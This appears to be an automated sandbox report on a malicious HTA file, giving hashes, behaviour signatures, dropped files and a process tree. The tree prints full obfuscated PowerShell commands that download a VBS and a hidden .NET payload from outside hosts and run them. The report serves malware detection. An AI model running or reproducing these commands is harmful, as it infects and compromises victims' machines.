Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 02:04

General

  • Target

    0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta

  • Size

    207KB

  • MD5

    1cc49542b6408627091678140cb916c9

  • SHA1

    66e198338df798a6ef051a71feee749bae890a6d

  • SHA256

    0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7

  • SHA512

    1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b

  • SSDEEP

    96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
      "C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gajkybws.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2068
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55AF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC559F.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2224
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:948
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES55AF.tmp

    Filesize

    1KB

    MD5

    cfb7007c6136321ce57ceae71b134418

    SHA1

    3db4537ca974b0ea9b951099d9579754efe32134

    SHA256

    83c88eced98885b81beb5d6e53e6cf25f5f6bfb5c20d9e443461753573c05200

    SHA512

    59497e35bee4b0eba64ec15319e6747255b3eafe04f781c912a3c02766cf8a7ec1f0b7f0234a0e554af2fa1b9323a4c31b1f6b17d9bc6f8a8aa7bb317d96b5f1

  • C:\Users\Admin\AppData\Local\Temp\gajkybws.dll

    Filesize

    3KB

    MD5

    8302414a34d62a438c28cabab3b7a40e

    SHA1

    04bd5cbdda34be8ba1d039ad25b61469fb2960d7

    SHA256

    c853a9fd5b796bd9a1ed6f6a9d1205797e5d410b7f50e9ec7880c6d782cc60af

    SHA512

    7b25341c043fe58ad5e49466112e5ca68709bebe46579c3e9d1e00fc3c176611f39aa27a8e9dca9310526987b5ec461d35925db2b67b68e163a4884dbcf3e840

  • C:\Users\Admin\AppData\Local\Temp\gajkybws.pdb

    Filesize

    7KB

    MD5

    ac915f97237545697225fb9f21b17c4d

    SHA1

    aa48c6e376a9e92e41a2dbd8d86774d078ed17f4

    SHA256

    f88b043e55a6d6e2451d2c9ac527a1bec563525eaa54d4054fcbdd6e92a34df8

    SHA512

    c8d48e55a44a899b50152a3411279e6d8da22e48a7b8c123a2b6ac79ba9f49b9e6d00cbeba29284822e4693cd20d03e3472d2154e4e29fc14f875fa6e00cce96

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    fbd917f6d90002f6564f790cf6ae0c46

    SHA1

    32bff93a180f61410917cf7082617510c8bca454

    SHA256

    50ebd0b684de3496de6565295dfbe24d702fe73d1f209be1ea2aeb6d1e9fd894

    SHA512

    4b5f092903b511f87a926ecf5b02771f3e055eeef98665aa5b4093c04bbb0f473407a48f87e747a1815a426656967d76082a5883021c3c892ed49c9ba48068fc

  • C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

    Filesize

    138KB

    MD5

    4f46597a54e903c400cac4db5a222ecb

    SHA1

    0a2f30da05a532bfbddaba3af235011d60db8fc8

    SHA256

    ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246

    SHA512

    ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC559F.tmp

    Filesize

    652B

    MD5

    651eab3d69a3935ee7394499c5bd05cb

    SHA1

    96bdfb0e540f1f5c780cc9063d41c8c49a50b7d7

    SHA256

    54405b4f4c645130db3743fc016b371b7c85f2f2551e71c8332ab37c17a05bcd

    SHA512

    3a8f966a7b5b37ad3100f69e40b85391c007949a934b00de87973ac0e90fb537bbde1b28c7d3f53b813e9263936467cc8643e7f292dcaaf21a084444683c63dc

  • \??\c:\Users\Admin\AppData\Local\Temp\gajkybws.0.cs

    Filesize

    483B

    MD5

    0b9734ed54c4f41d0c94957b007eb3d5

    SHA1

    ebabbb2d826295a994ba691d921a4c7c5ed506d1

    SHA256

    36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa

    SHA512

    d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

  • \??\c:\Users\Admin\AppData\Local\Temp\gajkybws.cmdline

    Filesize

    309B

    MD5

    ad0abdfe1d391631322dbcf7f85d256a

    SHA1

    0df977f2d9557da9f7367a68ca17fed54e544db3

    SHA256

    5cbd4a61f32011d5dbb77c39dfe3002f51463a3bd2c40f1f5fa4645b5f351226

    SHA512

    92455bc99bd95e05479751efbbf2c63d6dd95d4716eee029951036a89546dfeb109707f3ae2ff172995c510e620f0999a3bda415a5975aace2acc43b9a4dd17b